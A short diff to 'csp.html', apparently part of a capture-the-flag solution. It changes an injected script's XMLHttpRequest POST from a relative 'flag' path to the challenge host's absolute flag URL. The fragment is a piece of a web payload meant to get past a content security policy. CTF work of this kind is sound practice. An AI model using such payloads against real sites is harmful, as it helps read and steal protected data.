--- a/csp.html
+++ b/csp.html
@@ -1,6 +1,6 @@
 <script>
 let xhr = new XMLHttpRequest();
-xhr.open("POST", "flag");
+xhr.open("POST", "https://california-state-police.lac.tf/flag");
 xhr.setRequestHeader("Accept", "*/*");
 xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 
